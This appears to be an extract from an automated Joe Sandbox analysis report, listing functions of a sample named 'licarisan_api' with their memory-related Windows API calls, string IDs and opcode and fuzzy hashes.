                                    • Source File: 00000000.00000002.1516483994.00000000007A5000.00000040.00000001.01000000.00000003.sdmp, Offset: 007A5000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7a5000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: AllocVirtual
                                    • String ID: L$L$W$a$a$b$d$i$j@h$o$r$r$y
                                    • API String ID: 4275171209-1069717143
                                    • Opcode ID: ebf909719b9e7c46baebf3a4ca558fdfa9796b5f4b92d76a3b0821958d651c6e
                                    • Instruction ID: f0f26c890e3188f376f4735703a28c6d4fa34bc7826af27d2d91deedbb62b7ea
                                    • Opcode Fuzzy Hash: ebf909719b9e7c46baebf3a4ca558fdfa9796b5f4b92d76a3b0821958d651c6e
                                    • Instruction Fuzzy Hash: 0C81A3A1D042A88FE721CB24DC057EABB75EF96300F0041FAD44DAB681D6BD5BD58F52
                                    Function 007AC544 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 81COMMON
                                    Download Yara Rule
                                    APIs
                                    • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 007AC8B0
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516483994.00000000007A5000.00000040.00000001.01000000.00000003.sdmp, Offset: 007A5000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7a5000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: FreeVirtual
                                    • String ID: $MD7L
                                    • API String ID: 1263568516-2422098246
                                    • Opcode ID: ac9948482453c748f5dc05093e8cc5f8d6601c6b40e742922108a19c4732c76a
                                    • Instruction ID: 2dd5c82f20939a7197667997628abcfed24924a67eeb3396d0be1803efa5e38e
                                    • Opcode Fuzzy Hash: ac9948482453c748f5dc05093e8cc5f8d6601c6b40e742922108a19c4732c76a
                                    • Instruction Fuzzy Hash: 01318271F01718ABEB35CE64DC44BAAB774FB89711F2042E9E50DA7280C678AEC08F11
                                    Function 007CE472 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 144COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516559420.00000000007C8000.00000040.00000001.01000000.00000003.sdmp, Offset: 007C8000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7c8000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: ProtectVirtual
                                    • String ID: _S
                                    • API String ID: 544645111-1526738568
                                    • Opcode ID: 4e30d84ef595cf18db3447335625be39088a31f56854b312d37e13b517b5b340
                                    • Instruction ID: 1e1227318c5fc6ef8ea438d521fa81efde988f7953dcc775265eb448653b2cb7
                                    • Opcode Fuzzy Hash: 4e30d84ef595cf18db3447335625be39088a31f56854b312d37e13b517b5b340
                                    • Instruction Fuzzy Hash: 784149F2D041589FE7159A24CC88AEA7B78EB45310F1441FEE94D9B381D63C6A81CF61
                                    Function 007C8553 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 142COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516559420.00000000007C8000.00000040.00000001.01000000.00000003.sdmp, Offset: 007C8000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7c8000_licarisan_api.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: PH65
                                    • API String ID: 0-1265588624
                                    • Opcode ID: 3fc338ec14f9f95053cbbb53bda921ac1aedb34cbc0f5aa44924b36dae5e3710
                                    • Instruction ID: 98e146a947188c5e119d003d2c32a1c65ed4ac142453b4591f15876feb5b4386
                                    • Opcode Fuzzy Hash: 3fc338ec14f9f95053cbbb53bda921ac1aedb34cbc0f5aa44924b36dae5e3710
                                    • Instruction Fuzzy Hash: 6151C7B1D052549FE795CB20DCA9BBA7B78EB44310F1081EFD50A9A281DB7C5AC1CF12
                                    Function 007C85CD Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 109COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516559420.00000000007C8000.00000040.00000001.01000000.00000003.sdmp, Offset: 007C8000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7c8000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: ProtectVirtual
                                    • String ID: PH65
                                    • API String ID: 544645111-1265588624
                                    • Opcode ID: 4225ee0aefac708ac742df26d17d90c57da3901ae9c22056b4c809fa4258b3bc
                                    • Instruction ID: 733ed04356ffb897231b867bb4cfe44b730fccc2d45e32a5963a7634cc8faea1
                                    • Opcode Fuzzy Hash: 4225ee0aefac708ac742df26d17d90c57da3901ae9c22056b4c809fa4258b3bc
                                    • Instruction Fuzzy Hash: BC4183B1D042189FE7A5CB10DCA5BBA7774EB84314F1081EFD54A9A281DB7C6EC18F52
                                    Function 007DE175 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 107COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516559420.00000000007C8000.00000040.00000001.01000000.00000003.sdmp, Offset: 007C8000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7c8000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: ProtectVirtual
                                    • String ID: _S
                                    • API String ID: 544645111-1526738568
                                    • Opcode ID: 1d3490f960da272b8aa10475eed0ee8c704a1824c289de6736dbe7b83676a8b5
                                    • Instruction ID: b0dcae1a90b2608c152b7b47d4b8be977294263582c5e98b927d5151fe9e7169
                                    • Opcode Fuzzy Hash: 1d3490f960da272b8aa10475eed0ee8c704a1824c289de6736dbe7b83676a8b5
                                    • Instruction Fuzzy Hash: 0431F3F3D041649BF7249A14DC88BEB7678EB40314F1541BAE90DAA381D63DAE858F91
                                    Function 004378B8 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 105COMMON
                                    Download Yara Rule
                                    APIs
                                    • ExitProcess.KERNEL32(00000000), ref: 00437BB7
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516137583.0000000000420000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_420000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: ExitProcess
                                    • String ID:
                                    • API String ID: 621844428-399585960
                                    • Opcode ID: 49d25d6352dc79f7c2c12cdd3839f3b9b7167456abc41ddbc4dcf29ebaed7ab0
                                    • Instruction ID: 56d21dc33a467d3fa1317ada5b50cb653418c953da08e43c300a83135ec529ff
                                    • Opcode Fuzzy Hash: 49d25d6352dc79f7c2c12cdd3839f3b9b7167456abc41ddbc4dcf29ebaed7ab0
                                    • Instruction Fuzzy Hash: 6641C3B4E052298FEB24CF05D880BA9B7B6FF89318F1081DAD88967351D735AE918F54
                                    Function 0043736C Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 84COMMON
                                    Download Yara Rule
                                    APIs
                                    • ExitProcess.KERNEL32(00000000), ref: 00437BB7
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516137583.0000000000420000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_420000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: ExitProcess
                                    • String ID: N23I
                                    • API String ID: 621844428-2248891880
                                    • Opcode ID: 2e98b78d61cab58bb5cc3ac966f0ea52bc3588fe378bde3af44cf5a9546e9f96
                                    • Instruction ID: bfa9666d2d7158a92ad346b01f662cc8bbd1a2a43832b48fd15f412a3befe94a
                                    • Opcode Fuzzy Hash: 2e98b78d61cab58bb5cc3ac966f0ea52bc3588fe378bde3af44cf5a9546e9f96
                                    • Instruction Fuzzy Hash: 8C31D1F1C046199AFB308A11DC85BFE7775EB48311F1481EBD88961680DA3C5EC6DE12
                                    Function 004373F8 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 55COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516137583.0000000000420000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_420000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: ExitProcess
                                    • String ID: N23I
                                    • API String ID: 621844428-2248891880
                                    • Opcode ID: ecb000227b2d152e318c20b3ce5df5fb8d0648545da7612776343eb04cfb6ad9
                                    • Instruction ID: 37be6bd51d6d82ef75363c9c0ed6d6db5536edc6c582e880a23975268ed9e52d
                                    • Opcode Fuzzy Hash: ecb000227b2d152e318c20b3ce5df5fb8d0648545da7612776343eb04cfb6ad9
                                    • Instruction Fuzzy Hash: 7811A5F2C045046AF7258A21DC46BFF6639EB84710F14C1BBE50995690E93C5EC64922
                                    Function 007ABDE3 Relevance: 3.3, APIs: 1, Strings: 1, Instructions: 269COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516483994.00000000007A5000.00000040.00000001.01000000.00000003.sdmp, Offset: 007A5000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7a5000_licarisan_api.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID: 0-399585960
                                    • Opcode ID: 7c4efc74a92b83e83be866d9d434d7bbb205d0840e4df92d0dda7d0312292560
                                    • Instruction ID: 483339ee49c993c7a4aec668c1cfd450f0aafba8f8482ea8212fcdb08ee332f7
                                    • Opcode Fuzzy Hash: 7c4efc74a92b83e83be866d9d434d7bbb205d0840e4df92d0dda7d0312292560
                                    • Instruction Fuzzy Hash: F6B14D71E05228DBDB25CB14CC94BAAB7B5FB8A311F1082EAD94D67641C7386EC1CF41
                                    Function 007ABB93 Relevance: 3.3, APIs: 1, Strings: 1, Instructions: 264COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516483994.00000000007A5000.00000040.00000001.01000000.00000003.sdmp, Offset: 007A5000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7a5000_licarisan_api.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID: 0-399585960
                                    • Opcode ID: 9dce0f81928b1aa4b9cbb6527ce6c8dbabc1c9c30534fae873243628068cd636
                                    • Instruction ID: c10a7fcd8cca9d2d3cd9c8f01d5a7af49983d4f5850362fdd6b4bd01111a8bdc
                                    • Opcode Fuzzy Hash: 9dce0f81928b1aa4b9cbb6527ce6c8dbabc1c9c30534fae873243628068cd636
                                    • Instruction Fuzzy Hash: B1A1F4B1E00628DBEB248B14DC54BEAB774EF85311F1082EAE50D66281E73C5EC5CF62
                                    Function 007A6C56 Relevance: 3.2, APIs: 2, Instructions: 233COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516483994.00000000007A5000.00000040.00000001.01000000.00000003.sdmp, Offset: 007A5000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7a5000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: LibraryLoad
                                    • String ID:
                                    • API String ID: 1029625771-0
                                    • Opcode ID: cfc01cfd0eab6363b5896ee5fd9a566f3b1f60674a566719aea0e5f569aafc5d
                                    • Instruction ID: f783684de05f185fb7106a6708b9a399acd5d96c393b8680fd2b87f9668c6287
                                    • Opcode Fuzzy Hash: cfc01cfd0eab6363b5896ee5fd9a566f3b1f60674a566719aea0e5f569aafc5d
                                    • Instruction Fuzzy Hash: 8191C3A1D096A88BEB24CB24CC447EA7775EF91300F0481E9D44DA7642EA7E5FC5CF62
                                    Function 007A7749 Relevance: 3.2, APIs: 2, Instructions: 224libraryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • LoadLibraryW.KERNELBASE(?), ref: 007A778F
                                    • LoadLibraryW.KERNELBASE(FFFFF55C), ref: 007A77AC
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516483994.00000000007A5000.00000040.00000001.01000000.00000003.sdmp, Offset: 007A5000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7a5000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: LibraryLoad
                                    • String ID:
                                    • API String ID: 1029625771-0
                                    • Opcode ID: 327e200dd1b9adfa4ee0195adaa2a722327906017388ba0296ce51534a272ac4
                                    • Instruction ID: 57c27f79da152d7a99798d012e66f4a6d2fc6cac88f91f48822cd06cfbc64365
                                    • Opcode Fuzzy Hash: 327e200dd1b9adfa4ee0195adaa2a722327906017388ba0296ce51534a272ac4
                                    • Instruction Fuzzy Hash: FD91C4B1D096A88BEB24CB24CC447EAB774EF55300F0481E9D44DA7642EA7A5FC5CF62
                                    Function 007A74ED Relevance: 3.2, APIs: 2, Instructions: 222libraryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • LoadLibraryW.KERNELBASE(?), ref: 007A778F
                                    • LoadLibraryW.KERNELBASE(FFFFF55C), ref: 007A77AC
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516483994.00000000007A5000.00000040.00000001.01000000.00000003.sdmp, Offset: 007A5000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7a5000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: LibraryLoad
                                    • String ID:
                                    • API String ID: 1029625771-0
                                    • Opcode ID: 9d8b1b91ccc6a5f0a21ac15ba371959575c5b51ff6d683a2b1d193e517e3f5ed
                                    • Instruction ID: 7d90fbbcb4f2930aa0187012d922eb004231f85c09744512eac220a65f8f3672
                                    • Opcode Fuzzy Hash: 9d8b1b91ccc6a5f0a21ac15ba371959575c5b51ff6d683a2b1d193e517e3f5ed
                                    • Instruction Fuzzy Hash: 3091C4B1C096A88BEB24CB24CC447EAB774EF55300F0481E9D44DA7642EA3A5FC5CF62
                                    Function 007A74C8 Relevance: 3.2, APIs: 2, Instructions: 222libraryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • LoadLibraryW.KERNELBASE(?), ref: 007A778F
                                    • LoadLibraryW.KERNELBASE(FFFFF55C), ref: 007A77AC
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516483994.00000000007A5000.00000040.00000001.01000000.00000003.sdmp, Offset: 007A5000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7a5000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: LibraryLoad
                                    • String ID:
                                    • API String ID: 1029625771-0
                                    • Opcode ID: 4b2023a4ad0de6dacfccbafd2e2da2e9e60689f1d26258392b1a4a6ea50a2507
                                    • Instruction ID: e1776c682cc09b09dd1bd8f70d8d6c028e208327a48043861f6e404ff69d4ee6
                                    • Opcode Fuzzy Hash: 4b2023a4ad0de6dacfccbafd2e2da2e9e60689f1d26258392b1a4a6ea50a2507
                                    • Instruction Fuzzy Hash: BD91C4B1C096A88BEB24CB24CC447EA7775EF51300F0481E9D44DA7642EA3A5FC5CF62
                                    Function 007A7496 Relevance: 3.2, APIs: 2, Instructions: 222libraryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • LoadLibraryW.KERNELBASE(?), ref: 007A778F
                                    • LoadLibraryW.KERNELBASE(FFFFF55C), ref: 007A77AC
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516483994.00000000007A5000.00000040.00000001.01000000.00000003.sdmp, Offset: 007A5000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7a5000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: LibraryLoad
                                    • String ID:
                                    • API String ID: 1029625771-0
                                    • Opcode ID: 5f7b29cf8a9009d3d052daa7d879da056e34fcf478277d5d10b17f73eab7fa7c
                                    • Instruction ID: 5abd2e3c3cc54acfaa1c32f94a9773861534120657f285b0ecf0cf638b56257b
                                    • Opcode Fuzzy Hash: 5f7b29cf8a9009d3d052daa7d879da056e34fcf478277d5d10b17f73eab7fa7c
                                    • Instruction Fuzzy Hash: 1191C4B1C096A88BEB24CB24CC447EA7775EF91300F0481E9D44DA7642EA3A5FC5CF62
                                    Function 007AC4E0 Relevance: 3.2, APIs: 1, Strings: 1, Instructions: 205COMMON
                                    Download Yara Rule
                                    APIs
                                    • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 007AC8B0
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516483994.00000000007A5000.00000040.00000001.01000000.00000003.sdmp, Offset: 007A5000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7a5000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: FreeVirtual
                                    • String ID:
                                    • API String ID: 1263568516-399585960
                                    • Opcode ID: 5d452b159ebb6c52f4733c39274c8950cc467a1a64a8f802071f265faae025ca
                                    • Instruction ID: 1d6b8aab39f5475653e11a2d369e3b68141acb0cbcca2a11d152cad0e3cc197a
                                    • Opcode Fuzzy Hash: 5d452b159ebb6c52f4733c39274c8950cc467a1a64a8f802071f265faae025ca
                                    • Instruction Fuzzy Hash: 0A71D2B1E04218ABEB25CB14DC44BFAB7B5FB89311F2082E9E54D67680D6395EC1CF51
                                    Function 007AC2E9 Relevance: 3.2, APIs: 1, Strings: 1, Instructions: 186COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516483994.00000000007A5000.00000040.00000001.01000000.00000003.sdmp, Offset: 007A5000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7a5000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: FreeVirtual
                                    • String ID:
                                    • API String ID: 1263568516-399585960
                                    • Opcode ID: e53a4ef92664cffe01a7f65f541101bd7368b2b8bde171bee6fc2f7aafd7f40f
                                    • Instruction ID: 1454df68315c955358c5cefdc6ac18620cbc22f130af90f8b43ad52f406ec6be
                                    • Opcode Fuzzy Hash: e53a4ef92664cffe01a7f65f541101bd7368b2b8bde171bee6fc2f7aafd7f40f
                                    • Instruction Fuzzy Hash: 7C61D4B5E04218AAEB25CF24DC447FAB7B4FB89301F2082EAE50D67680D6395EC1CF51
                                    Function 007AC12A Relevance: 3.2, APIs: 1, Strings: 1, Instructions: 180COMMON
                                    Download Yara Rule
                                    APIs
                                    • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 007AC8B0
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516483994.00000000007A5000.00000040.00000001.01000000.00000003.sdmp, Offset: 007A5000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7a5000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: FreeVirtual
                                    • String ID:
                                    • API String ID: 1263568516-399585960
                                    • Opcode ID: efcf237d23f1d43ed0f3677133fe890ecb8f2a9d7b7adac07fd989f1be68aaf4
                                    • Instruction ID: a50032a4c13e154a05892b193dfff34e4f983d6c7830a68b2dad251d419a7d60
                                    • Opcode Fuzzy Hash: efcf237d23f1d43ed0f3677133fe890ecb8f2a9d7b7adac07fd989f1be68aaf4
                                    • Instruction Fuzzy Hash: 5251DAB2E05314ABE7258A54DC45BFB7778FB8A310F1042FAE40D66680D67C6EC18F52
                                    Function 007AC307 Relevance: 3.2, APIs: 1, Strings: 1, Instructions: 178COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516483994.00000000007A5000.00000040.00000001.01000000.00000003.sdmp, Offset: 007A5000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7a5000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: FreeVirtual
                                    • String ID:
                                    • API String ID: 1263568516-399585960
                                    • Opcode ID: af731f63c2b250db9cfa5d950f01727fb9f1ed3456695a4a31160b9990aec750
                                    • Instruction ID: 5ad3e7d97b6c1c440bf13dabee0e2cf5a08e4b328843a01ec4c4056bfbb69f31
                                    • Opcode Fuzzy Hash: af731f63c2b250db9cfa5d950f01727fb9f1ed3456695a4a31160b9990aec750
                                    • Instruction Fuzzy Hash: E761B3B5E04218AAEB25CF64DC447FAB774FB89311F2082EAE50DA7280D6395EC1CF51
                                    Function 007AC429 Relevance: 3.2, APIs: 1, Strings: 1, Instructions: 177COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516483994.00000000007A5000.00000040.00000001.01000000.00000003.sdmp, Offset: 007A5000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7a5000_licarisan_api.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID: 0-399585960
                                    • Opcode ID: 44ca4fb1d9d6e3f5d93bd2f02fb685e89d1f6b532f8ee7ed0f6e4791e1a517ce
                                    • Instruction ID: 96134e09aa9fe1f72136bf6f89d8e9dfdc1626ea1a7cefec0b1344864de89126
                                    • Opcode Fuzzy Hash: 44ca4fb1d9d6e3f5d93bd2f02fb685e89d1f6b532f8ee7ed0f6e4791e1a517ce
                                    • Instruction Fuzzy Hash: AB61E3B1E04328AAEB25CF54DC847FAB7B5FB89311F2082E9E50D66280D6785EC1CF51
                                    Function 007AC312 Relevance: 3.2, APIs: 1, Strings: 1, Instructions: 174COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516483994.00000000007A5000.00000040.00000001.01000000.00000003.sdmp, Offset: 007A5000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7a5000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: FreeVirtual
                                    • String ID:
                                    • API String ID: 1263568516-399585960
                                    • Opcode ID: fef2ad6fef6e112200b01d8056e5bdb4def4a8930aef023edefc4dea60606043
                                    • Instruction ID: b7e64acfb86e13212ac15686533959ff74233feae663af9c7e71dbbf56eb4e9a
                                    • Opcode Fuzzy Hash: fef2ad6fef6e112200b01d8056e5bdb4def4a8930aef023edefc4dea60606043
                                    • Instruction Fuzzy Hash: 5361B3B5E042189AEB25CF64DC447FAB7B4FB89311F2082EAE50DA7280D6395EC1CF11
                                    Function 007ABA85 Relevance: 3.2, APIs: 1, Strings: 1, Instructions: 160COMMON
                                    Download Yara Rule
                                    APIs
                                    • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 007AC8B0
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516483994.00000000007A5000.00000040.00000001.01000000.00000003.sdmp, Offset: 007A5000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7a5000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: FreeVirtual
                                    • String ID:
                                    • API String ID: 1263568516-399585960
                                    • Opcode ID: 03eb40003d7aea7a48d3c7f105ea3e8ff05d8ea32fc4a51b69587840cfe87027
                                    • Instruction ID: b8b7e92d9b7152237af518181a550742c0f62f831b53ba9a4572bf736b3b4a4d
                                    • Opcode Fuzzy Hash: 03eb40003d7aea7a48d3c7f105ea3e8ff05d8ea32fc4a51b69587840cfe87027
                                    • Instruction Fuzzy Hash: 9C51F7B2E006149BE7208A14DC59BFBB778EBC5311F1042FAE90D66680D77D6EC58F61
                                    Function 007AC3D6 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 132COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516483994.00000000007A5000.00000040.00000001.01000000.00000003.sdmp, Offset: 007A5000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7a5000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: FreeVirtual
                                    • String ID:
                                    • API String ID: 1263568516-399585960
                                    • Opcode ID: 609a1b9cb26e3aa2522e0ee4f1faa309225e629142b8d4171cf7ce40ef8fc6c0
                                    • Instruction ID: 89d93d233a294802a02b560c9e8b1c12a988538d0c1fcaee43f98b5dc6941631
                                    • Opcode Fuzzy Hash: 609a1b9cb26e3aa2522e0ee4f1faa309225e629142b8d4171cf7ce40ef8fc6c0
                                    • Instruction Fuzzy Hash: 1B41E971E04318ABEB258B65DC44BBAB774FBCA311F2042EAE54D66280D6386EC1CF51
                                    Function 007AC1FB Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 127COMMON
                                    Download Yara Rule
                                    APIs
                                    • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 007AC8B0
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516483994.00000000007A5000.00000040.00000001.01000000.00000003.sdmp, Offset: 007A5000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7a5000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: FreeVirtual
                                    • String ID:
                                    • API String ID: 1263568516-399585960
                                    • Opcode ID: 9eebcd0e7b7385d5ef7c7b0f17f4bd759b2c7f81346ee6301c4d9706da20839f
                                    • Instruction ID: 3ffdc16ab6d6340c4aff0d61841bd96e4efc6cb509aad342ea65768bb1ba5a13
                                    • Opcode Fuzzy Hash: 9eebcd0e7b7385d5ef7c7b0f17f4bd759b2c7f81346ee6301c4d9706da20839f
                                    • Instruction Fuzzy Hash: 0041C671E05318ABEB258B54DC85BFAB774FB8A711F1042E9E40E67680C6786EC1CF51
                                    Function 007ABCFD Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 106COMMON
                                    Download Yara Rule
                                    APIs
                                    • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 007AC8B0
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516483994.00000000007A5000.00000040.00000001.01000000.00000003.sdmp, Offset: 007A5000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7a5000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: FreeVirtual
                                    • String ID:
                                    • API String ID: 1263568516-399585960
                                    • Opcode ID: eb6a7abb7b6730169ed53399002660d307ffb30814cfb39ce4ea58d2f8daef02
                                    • Instruction ID: 73e78a0fb78c357113fee7fb23c8f2a0d3e2943daccf5ce3d10d15171b6212a0
                                    • Opcode Fuzzy Hash: eb6a7abb7b6730169ed53399002660d307ffb30814cfb39ce4ea58d2f8daef02
                                    • Instruction Fuzzy Hash: 9431C1B2F00618ABE7748A15DC49FBAB779EBC5310F2042E9E50D66680DA7C6EC18E51
                                    Function 007AC482 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 103COMMON
                                    Download Yara Rule
                                    APIs
                                    • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 007AC8B0
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516483994.00000000007A5000.00000040.00000001.01000000.00000003.sdmp, Offset: 007A5000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7a5000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: FreeVirtual
                                    • String ID:
                                    • API String ID: 1263568516-399585960
                                    • Opcode ID: 590f64cee7a2a9b17896224b807a19b6f7f14f63fe24103004ae685ae5e2c058
                                    • Instruction ID: cc1cb1ac1b063942eb606db63563e8c9e06bc8ad024985c45ad83a62e43b336e
                                    • Opcode Fuzzy Hash: 590f64cee7a2a9b17896224b807a19b6f7f14f63fe24103004ae685ae5e2c058
                                    • Instruction Fuzzy Hash: 1231C972E00318ABEB25CE24DC44BBAB775FBCA711F2042E9E50D66680C6386EC08F51
                                    Function 007AC117 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 103COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516483994.00000000007A5000.00000040.00000001.01000000.00000003.sdmp, Offset: 007A5000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7a5000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: FreeVirtual
                                    • String ID:
                                    • API String ID: 1263568516-399585960
                                    • Opcode ID: a69b9c879ee4d4e61510bcbd93e62abcac418c4e3f509350cdbe28da51aa2944
                                    • Instruction ID: 1525e216f2bc8bcf1402efd099ecb8f3a00f55bd75e34b66b43ff55d90c0902e
                                    • Opcode Fuzzy Hash: a69b9c879ee4d4e61510bcbd93e62abcac418c4e3f509350cdbe28da51aa2944
                                    • Instruction Fuzzy Hash: 6231F6B2F01718ABFB358A55DC45BABB778EB85310F1042F9E50D96680D57C9EC08F51
                                    Function 007ABD04 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 99COMMON
                                    Download Yara Rule
                                    APIs
                                    • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 007AC8B0
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516483994.00000000007A5000.00000040.00000001.01000000.00000003.sdmp, Offset: 007A5000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7a5000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: FreeVirtual
                                    • String ID:
                                    • API String ID: 1263568516-399585960
                                    • Opcode ID: 0c97f7765b71ef8214ac5984f3205be60dc1759ccad33ba4416cbafa304ce69e
                                    • Instruction ID: 29141079ee3b7bd575e7e1cd5743c99c4c94e6e882dc8c19460af3c6d215210d
                                    • Opcode Fuzzy Hash: 0c97f7765b71ef8214ac5984f3205be60dc1759ccad33ba4416cbafa304ce69e
